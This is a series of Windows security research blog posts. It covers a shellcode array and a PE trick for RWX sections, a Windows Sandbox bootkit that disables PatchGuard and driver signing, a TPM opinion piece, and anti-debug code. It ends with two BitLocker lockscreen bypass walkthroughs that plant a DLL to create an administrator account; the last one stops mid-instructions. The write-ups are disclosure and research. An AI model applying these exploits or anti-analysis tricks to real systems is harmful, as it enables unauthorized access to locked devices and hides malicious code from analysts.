	0x0F, 0xB7, 0x0A, 0x41, 0x3B, 0xC9, 0x74, 0x0D, 0xFF, 0xC0, 0x48, 0x83,
	0xC2, 0x02, 0x41, 0x3B, 0xC2, 0x72, 0xED, 0xEB, 0x3D, 0x44, 0x8B, 0x44,
	0x85, 0x00, 0x4C, 0x03, 0xC3, 0x74, 0x33, 0x41, 0x0F, 0xB6, 0x00, 0x33,
	0xD2, 0xB9, 0x05, 0x15, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x24, 0x66, 0x90,
	0x6B, 0xC9, 0x21, 0x8D, 0x52, 0x01, 0x0F, 0xBE, 0xC0, 0x03, 0xC8, 0x42,
	0x0F, 0xB6, 0x04, 0x02, 0x84, 0xC0, 0x75, 0xEC, 0x81, 0xF9, 0xB4, 0x14,
	0x4F, 0x38, 0x75, 0x06, 0x45, 0x8B, 0x3B, 0x4C, 0x03, 0xFB, 0x41, 0xFF,
	0xC1, 0x49, 0x83, 0xC3, 0x04, 0x44, 0x3B, 0xCE, 0x72, 0x92, 0x45, 0x33,
	0xC9, 0xC7, 0x44, 0x24, 0x20, 0x54, 0x65, 0x73, 0x74, 0x4C, 0x8D, 0x44,
	0x24, 0x20, 0xC6, 0x44, 0x24, 0x24, 0x00, 0x48, 0x8D, 0x54, 0x24, 0x20,
	0x33, 0xC9, 0x41, 0xFF, 0xD7, 0xBA, 0x7B, 0x00, 0x00, 0x00, 0x48, 0xC7,
	0xC1, 0xFF, 0xFF, 0xFF, 0xFF, 0x41, 0xFF, 0xD4, 0x48, 0x8B, 0x5C, 0x24,
	0x60, 0x48, 0x8B, 0x6C, 0x24, 0x68, 0x48, 0x8B, 0x74, 0x24, 0x70, 0x48,
	0x8B, 0x7C, 0x24, 0x78, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E,
	0x41, 0x5C, 0xC3
};

As a side note, several readers have asked how I created this sample code (previously used in another project) which works correctly in both 32-bit and 64-bit modes. The answer is very simple: it begins by storing the original stack pointer value, pushes a value onto the stack, and compares the new stack pointer to the original value. If the difference is 8, the 64-bit code is executed - otherwise, the 32-bit code is executed. While there are certainly more efficient approaches to achieve this outcome, this method is sufficient for demonstration purposes:

mov eax, esp	; store stack ptr
push 0		; push a value onto the stack
sub eax, esp	; calculate difference
pop ecx		; restore stack
cmp eax, 8	; check if the difference is 8
je 64bit_code
32bit_code:
xxxx
64bit_code:
xxxx

By appending this payload to the original headers above, we can generate a valid and functional EXE file. The provided PE headers contain a hardcoded SizeOfImage value of 0x100000 which allows for a maximum payload size of almost 1MB, but this can be increased if necessary. Running this program will display our message box, despite the fact that the PE headers lack any executable sections, or any sections at all in this case:

Demonstration #2 - Executable PE with spoofed sections

Perhaps more interestingly, it is also possible to create a fake section table using this mode as mentioned earlier. I have created another EXE which follows a similar format to the previous samples, but also includes a single read-only section:

The main payload has been stored within this read-only section and the entry-point has been updated to 0x1000. Under normal circumstances, you would expect the program to crash immediately with an access-violation exception due to attempting to execute read-only memory. However, this doesn’t occur here - the target memory region contains RWX permissions and the payload is executed successfully:

Notes

The sample EXE files can be downloaded here.

The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers themselves using this technique. The module will fail to load if the AddressOfEntryPoint value is less than the SizeOfHeaders value, but this can easily be bypassed since the SizeOfHeaders value is not strictly enforced. It can even be set to 0, allowing the entry-point to be positioned anywhere within the file.

It is possible that this feature was initially designed to allow for very small images, enabling the headers, code, and data to fit within a single memory page. As memory protection is applied per-page, it makes sense to apply RWX to all PTEs when the virtual section size is lower than the page size - it would otherwise be impossible to manage protections correctly if multiple sections resided within a single page.

I have tested these EXE files on various different versions of Windows from Vista to 10 with success in all cases. Unfortunately it has very little practical use in the real world as it won’t deceive any modern disassemblers - nonetheless, it remains an interesting concept.

Bootkitting Windows Sandbox

29 August 2022 at 23:00

Introduction & Motivation

Windows Sandbox is a feature that Microsoft added to Windows back in May 2019. As Microsoft puts it:

Windows Sandbox provides a lightweight desktop environment to safely run applications in isolation. Software installed inside the Windows Sandbox environment remains “sandboxed” and runs separately from the host machine.

The startup is usually very fast and the user experience is great. You can configure it with a .wsb file and then double click that file to start a clean VM.

The sandbox can be useful for malware analysis and as we will show in this article, it can also be used for kernel research and driver development. We will take things a step further though and share how we can intercept the boot process and patch the kernel during startup with a bootkit.

TLDR: Visit the SandboxBootkit repository to try out the bootkit for yourself.

Windows Sandbox for driver development

A few years back Jonas L tweeted about the undocumented command CmDiag. It turns out that it is almost trivial to enable test signing and kernel debugging in the sandbox (this part was copied straight from my StackOverflow answer).

First you need to enable development mode (everything needs to be run from an Administrator command prompt):

CmDiag DevelopmentMode -On

Then enable network debugging (you can see additional options with CmDiag Debug):

CmDiag Debug -On -Net

This should give you the connection string:

Debugging successfully enabled.

Connection string: -k net:port=50100,key=cl.ea.rt.ext,target=<ContainerHostIp> -v

Now start WinDbg and connect to 127.0.0.1:

windbg.exe -k net:port=50100,key=cl.ea.rt.ext,target=127.0.0.1 -v

Then you start Windows Sandbox and it should connect:

Microsoft (R) Windows Debugger Version 10.0.22621.1 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Using NET for debugging
Opened WinSock 2.0
Using IPv4 only.
Waiting to reconnect...
Connected to target 127.0.0.1 on port 50100 on local IP <xxx.xxx.xxx.xxx>.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 19041 x64 target at (Sun Aug  7 10:32:11.311 2022 (UTC + 2:00)), ptr64 TRUE
Kernel Debugger connection established.

Now in order to load your driver you have to copy it into the sandbox and you can use sc create and sc start to run it. Obviously most device drivers will not work/freeze the VM but this can certainly be helpful for research.

The downside of course is that you need to do quite a bit of manual work and this is not exactly a smooth development experience. Likely you can improve it with the <MappedFolder> and <LogonCommand> options in your .wsb file.

PatchGuard & DSE

Running Windows Sandbox with a debugger attached will disable PatchGuard and with test signing enabled you can run your own kernel code. Attaching a debugger every time is not ideal though. Startup times are increased by a lot and software might detect kernel debugging and refuse to run. Additionally it seems that the network connection is not necessarily stable across host reboots and you need to restart WinDbg every time to attach the debugger to the sandbox.

Tooling similar to EfiGuard would be ideal for our purposes and in the rest of the post we will look at implementing our own bootkit with equivalent functionality.

Windows Sandbox internals recap

Back in March 2021 a great article called Playing in the (Windows) Sandbox came out. This article has a lot of information about the internals and a lot of the information below comes from there. Another good resource is Microsoft’s official Windows Sandbox architecture page.

Windows Sandbox uses VHDx layering and NTFS magic to allow the VM to be extremely lightweight. Most of the system files are actually NTFS reparse points that point to the host file system. For our purposes the relevant file is BaseLayer.vhdx (more details in the references above).

What the article did not mention is that there is a folder called BaseLayer pointing directly inside the mounted BaseLayer.vhdx at the following path on the host:

C:\ProgramData\Microsoft\Windows\Containers\BaseImages\<GUID>\BaseLayer

This is handy because it allows us to read/write to the Windows Sandbox file system without having to stop/restart CmService every time we want to try something. The only catch is that you need to run as TrustedInstaller and you need to enable development mode to modify files there.

When you enable development mode there will also be an additional folder called DebugLayer in the same location. This folder exists on the host file system and allows us to overwrite certain files (BCD, registry hives) without having to modify the BaseLayer. The configuration for the DebugLayer appears to be in BaseLayer\Bindings\Debug, but no further time was spent investigating. The downside of enabling development mode is that snapshots are disabled and as a result startup times are significantly increased. After modifying something in the BaseLayer and disabling development mode you also need to delete the Snapshots folder and restart CmService to apply the changes.

Getting code execution at boot time

To understand how to get code execution at boot time you need some background on UEFI. We released Introduction to UEFI a few years back and there is also a very informative series called Geeking out with the UEFI boot manager that is useful for our purposes.

In our case it is enough to know that the firmware will try to load EFI\Boot\bootx64.efi from the default boot device first. You can override this behavior by setting the BootOrder UEFI variable. To find out how Windows Sandbox boots you can run the following PowerShell commands:

> Set-ExecutionPolicy -ExecutionPolicy Unrestricted
> Install-Module UEFI
> Get-UEFIVariable -VariableName BootOrder -AsByteArray
0
0
> Get-UEFIVariable -VariableName Boot0000
VMBus File SystemVMBus\EFI\Microsoft\Boot\bootmgfw.efi

From this we can derive that Windows Sandbox first loads:

\EFI\Microsoft\Boot\bootmgfw.efi

As described in the previous section we can access this file on the host (as TrustedInstaller) via the following path:

C:\ProgramData\Microsoft\Windows\Containers\BaseImages\<GUID>\BaseLayer\Files\EFI\Microsoft\Boot\bootmgfw.efi

To verify our assumption we can rename the file and try to start Windows Sandbox. If you check in Process Monitor you will see vmwp.exe fails to open bootmgfw.efi and nothing happens after that.

Perhaps it is possible to modify UEFI variables and change Boot0000 (Hyper-V Manager can do this for regular VMs so probably there is a way), but for now it will be easier to modify bootmgfw.efi directly.

Bootkit overview

To gain code execution we embed a copy of our payload inside bootmgfw and then we modify the entry point to our payload.

Our EfiEntry does the following:

  • Get the image base/size of the currently running module
  • Relocate the image when necessary
  • Hook the BootServices->OpenProtocol function
  • Get the original AddressOfEntryPoint from the .bootkit section
  • Execute the original entry point

To simplify the injection of SandboxBootkit.efi into the .bootkit section we use the linker flags /FILEALIGN:0x1000 /ALIGN:0x1000. This sets the FileAlignment and SectionAlignment to PAGE_SIZE, which means the file on disk and in-memory are mapped one-to-one.

Bootkit hooks

Note: Many of the ideas presented here come from the DmaBackdoorHv project by Dmytro Oleksiuk, go check it out!

The first issue you run into when modifying bootmgfw.efi on disk is that the self integrity checks will fail. The function responsible for this is called BmFwVerifySelfIntegrity and it directly reads the file from the device (e.g. it does not use the UEFI BootServices API). To bypass this there are two options:

  1. Hook BmFwVerifySelfIntegrity to return STATUS_SUCCESS
  2. Use bcdedit /set {bootmgr} nointegritychecks on to skip the integrity checks. Likely it is possible to inject this option dynamically by modifying the LoadOptions, but this was not explored further

Initially we opted to use bcdedit, but this can be detected from within the sandbox so instead we patch BmFwVerifySelfIntegrity.

We are able to hook into winload.efi by replacing the boot services OpenProtocol function pointer. This function gets called by EfiOpenProtocol, which gets executed as part of winload!BlInitializeLibrary.

In the hook we walk from the return address to the ImageBase and check if the image exports BlImgLoadPEImageEx. The OpenProtocol hook is then restored and the BlImgLoadPEImageEx function is detoured. This function is nice because it allows us to modify ntoskrnl.exe right after it is loaded (and before the entry point is called).

If we detect the loaded image is ntoskrnl.exe we call HookNtoskrnl where we disable PatchGuard and DSE. EfiGuard patches very similar locations so we will not go into much detail here, but here is a quick overview:

  • Driver Signature Enforcement is disabled by patching the parameter to CiInitialize in the function SepInitializeCodeIntegrity
  • PatchGuard is disabled by modifying the KeInitAmd64SpecificState initialization routine

Bonus: Logging from Windows Sandbox

To debug the bootkit on a regular Hyper-V VM there is a great guide by tansadat. Unfortunately there is no known way to enable serial port output for Windows Sandbox (please reach out if you know of one) and we have to find a different way of getting logs out.

Luckily for us Process Monitor allows us to see sandbox file system accesses (filter for vmwp.exe), which allows for a neat trick: accessing a file called \EFI\my log string. As long as we keep the path length under 256 characters and exclude certain characters this works great!

Procmon showing log strings from the bootkit

A more primitive way of debugging is to just kill the VM at certain points to test if code is executing as expected:

void Die() {
    // At least one of these should kill the VM
    __fastfail(1);
    __int2c();
    __ud2();
    *(UINT8*)0xFFFFFFFFFFFFFFFFull = 1;
}

Bonus: Getting started with UEFI

The SandboxBootkit project only uses the headers of the EDK2 project. This might not be convenient when starting out (we had to implement our own EfiQueryDevicePath for instance) and it might be easier to get started with the VisualUefi project.

Final words

That is all for now. You should now be able to load a driver like TitanHide without having to worry about enabling test signing or disabling PatchGuard! With a bit of registry modifications you should also be able to load DTrace (or the more hackable implementation STrace) to monitor syscalls happening inside the sandbox.

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Preventing memory inspection on Windows

By: jm
23 May 2021 at 23:00

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload

Constraints

To exploit this vulnerability, you will need:

  1. A surface touchscreen device. I used a surface book 2 15’ (Running up-to-date Windows 10 20H2 with BitLocker enabled)
  2. A external keyboard
  3. A flash drive containing your payload.

Keyboard confusion

By connecting a external keyboard to our Surface device, we have the capability using both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.

Narration

Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by clicking Windows+U and selecting “Enable narrator”

I forgot my password

A Forgotten password is one of the few cases you would ever do anything but login on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left, choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”

Navigating settings

You wouldn’t think you could much with a hidden settings window on a locked Windows device, but you can actually navigate said window with a external keyboard. While holding down the Caps Lock key, the arrow keys and the tab key can be used to navigate UI elements.

One weaponization of this is going to Autoplay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute windows binaries from a usb thumb-drive.

Disclosure

I reported the issue to MSRC, but they ignored the bug report citing a need of PoC, which I had already provided, they had also expressed disbelief towards the exploitability of this bug.

Demonstration

Process on a diet: anti-debug using job objects

By: jm
20 January 2021 at 23:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker Lockscreen bypass

By: Jonas L
15 January 2021 at 23:00

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:

amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.657_none_e6c5b579130e3898

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
-----
